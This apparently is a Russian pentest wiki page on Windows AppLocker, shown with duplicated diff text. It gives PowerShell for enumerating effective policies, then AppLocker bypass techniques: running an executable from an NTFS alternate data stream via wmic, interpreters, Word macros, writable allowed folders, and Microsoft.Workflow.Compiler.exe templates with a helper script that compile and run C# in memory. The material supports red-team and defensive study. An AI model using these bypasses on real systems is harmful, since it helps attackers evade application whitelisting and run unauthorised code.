Applocker — различия между версиями

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= Общее =
== Получение политики (все юзеры) ==
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
Get-ApplockerPolicy -effective
== Получение политики (все группы текущего пользователя) ==
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
$a = Get-ApplockerPolicy -effective

$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
$g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
$f = 0;
$v = $y.UserOrGroupSid.value;
Foreach ($z in $g){
if (($z.Value -eq $u) -or ($z.Value -eq $v)){
$f= 1;
  if ($f -eq 1){
Write-Output $y.PathConditions;
Write-Output $y.Action;
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
$a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};
= Обход AppLocker =
== Альтернативный канал ==
Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
type test.exe > C:\logs:test.exe
wmic process call create '"C:\logs:test.exe"'
== Интерпретаторы ==
* python
* perl
* java
И так далее
== Макросы ворда ==
Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
== Небезопасные политики ==
Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
== InstallUtil ==
См. [amsi]
== Microsoft.Workflow.Compiler.exe ==
<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll; height: 300px" >
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="" xmlns="">
<files xmlns:d2p1="">
<parameters xmlns:d2p1="">
<assemblyNames xmlns:d3p1="" xmlns="" />
<compilerOptions i:nil="true" xmlns="" />
<coreAssemblyFileName xmlns=""></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="" xmlns="" />
<evidence xmlns:d3p1="" i:nil="true" xmlns="" />
<generateExecutable xmlns="">false</generateExecutable>
<generateInMemory xmlns="">true</generateInMemory>
<includeDebugInformation xmlns="">false</includeDebugInformation>
<linkedResources xmlns:d3p1="" xmlns="" />
<mainClass i:nil="true" xmlns="" />
<outputName xmlns=""></outputName>
<tempFiles i:nil="true" xmlns="" />
<treatWarningsAsErrors xmlns="">false</treatWarningsAsErrors>
<warningLevel xmlns="">-1</warningLevel>
<win32Resource i:nil="true" xmlns="" />
<d2p1:compilerOptions i:nil="true" />
<d2p1:libraryPaths xmlns:d3p1="" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="" i:nil="true" />
<d2p1:mtInfo i:nil="true" />
<d2p1:userCodeCCUs xmlns:d3p1="" i:nil="true" />
<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="" xmlns="">
    <CodeActivity x:Name="codeActivity1" />
    public class Foo : SequentialWorkflowActivity {
    public Foo() {
Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
Полный фрагмент кода для автоматизации запуска:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll;height:300px;" >
function New-CompilerInputXml {
Creates a an XML file consisting of a serialized CompilerInput object.
New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
    param (
        $XOMLPath = 'test.xoml',
        [Parameter(Mandatory = $True)]
    # This assembly won't be loaded by default. We need to load
    # it in order to get access to the WorkflowCompilerParameters class.
    Add-Type -AssemblyName 'System.Workflow.ComponentModel'
    # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
    $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
    # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
    $WFCompilerParams.GenerateInMemory = $True
    # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
    $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
    # Load the assembly
    $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
    # This is the helper method that will serialize the CompilerInput object to disk
    $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
    $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
    Move-Item $TempFile $OutputPath -PassThru
Подробнее тут:
= Ссылки =

Версия 14:50, 16 марта 2022

Applocker - функция управления приложениями и политиками по запуску программного обеспечения в Windows.

Позволяет управлять:

  • Исполняемые файлы
    • EXE
    • COM
  • Скрипты
    • JS
    • PS1
    • VBS
    • CMD
    • BAT
  • Установочные файлы
    • MST
    • MSI
    • MSP
  • Библиотеки
    • DLL
    • OCX
  • Упакованные приложения
    • APPX


Получение политики (все юзеры)

1 Get-ApplockerPolicy -effective

Получение политики (все группы текущего пользователя)

 1 $a = Get-ApplockerPolicy -effective
 3 $u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
 4 $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
 6 Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
 7 $f = 0;
 8 $v = $y.UserOrGroupSid.value; 
 9 Foreach ($z in $g){
10 if (($z.Value -eq $u) -or ($z.Value -eq $v)){
11 $f= 1;
12 };
13 };
14   if ($f -eq 1){
15 Write-Output $y.PathConditions;
16 Write-Output $y.Action;
17 }
18 }}


1 $a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};

Обход AppLocker

Альтернативный канал

Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:

1 type test.exe > C:\logs:test.exe
2 wmic process call create '"C:\logs:test.exe"'


  • python
  • perl
  • java

И так далее

Макросы ворда

Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.

Небезопасные политики

Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.


См. [amsi]



 1 <?xml version="1.0" encoding="utf-8"?>
 2 <CompilerInput xmlns:i="" xmlns="">
 3 <files xmlns:d2p1="">
 4 <d2p1:string>test.xoml</d2p1:string>
 5 </files>
 6 <parameters xmlns:d2p1="">
 7 <assemblyNames xmlns:d3p1="" xmlns="" />
 8 <compilerOptions i:nil="true" xmlns="" />
 9 <coreAssemblyFileName xmlns=""></coreAssemblyFileName>
10 <embeddedResources xmlns:d3p1="" xmlns="" />
11 <evidence xmlns:d3p1="" i:nil="true" xmlns="" />
12 <generateExecutable xmlns="">false</generateExecutable>
13 <generateInMemory xmlns="">true</generateInMemory>
14 <includeDebugInformation xmlns="">false</includeDebugInformation>
15 <linkedResources xmlns:d3p1="" xmlns="" />
16 <mainClass i:nil="true" xmlns="" />
17 <outputName xmlns=""></outputName>
18 <tempFiles i:nil="true" xmlns="" />
19 <treatWarningsAsErrors xmlns="">false</treatWarningsAsErrors>
20 <warningLevel xmlns="">-1</warningLevel>
21 <win32Resource i:nil="true" xmlns="" />
22 <d2p1:checkTypes>false</d2p1:checkTypes>
23 <d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
24 <d2p1:compilerOptions i:nil="true" />
25 <d2p1:generateCCU>false</d2p1:generateCCU>
26 <d2p1:languageToUse>CSharp</d2p1:languageToUse>
27 <d2p1:libraryPaths xmlns:d3p1="" i:nil="true" />
28 <d2p1:localAssembly xmlns:d3p1="" i:nil="true" />
29 <d2p1:mtInfo i:nil="true" />
30 <d2p1:userCodeCCUs xmlns:d3p1="" i:nil="true" />
31 </parameters>
32 </CompilerInput>


 1 <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="" xmlns="">
 2     <CodeActivity x:Name="codeActivity1" />
 3     <x:Code><![CDATA[
 4     public class Foo : SequentialWorkflowActivity {
 5      public Foo() {
 6             Console.WriteLine("FOOO!!!!");
 7         }
 8     }
 9     ]]></x:Code>
10 </SequentialWorkflowActivity>

Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:

1 C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml

Полный фрагмент кода для автоматизации запуска:

 1 function New-CompilerInputXml {
 2 <#
 4 Creates a an XML file consisting of a serialized CompilerInput object.
 6 New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
 8 Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
 9 .PARAMETER OutputPath
10 Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
12 New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
13 Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
15 New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
16 Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
18 System.IO.FileInfo
19 Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
20 #>
22     [OutputType([System.IO.FileInfo])]
23     param (
24         [String]
25         [ValidateNotNullOrEmpty()]
26         $XOMLPath = 'test.xoml',
28         [Parameter(Mandatory = $True)]
29         [String]
30         [ValidateNotNullOrEmpty()]
31         $OutputPath
32     )
34     # This assembly won't be loaded by default. We need to load
35     # it in order to get access to the WorkflowCompilerParameters class.
36     Add-Type -AssemblyName 'System.Workflow.ComponentModel'
38     # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
39     $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
41     # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
42     $WFCompilerParams.GenerateInMemory = $True
44     # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
45     $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
47     # Load the assembly
48     $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
50     # This is the helper method that will serialize the CompilerInput object to disk
51     $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
53     $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
55     Move-Item $TempFile $OutputPath -PassThru
56 }

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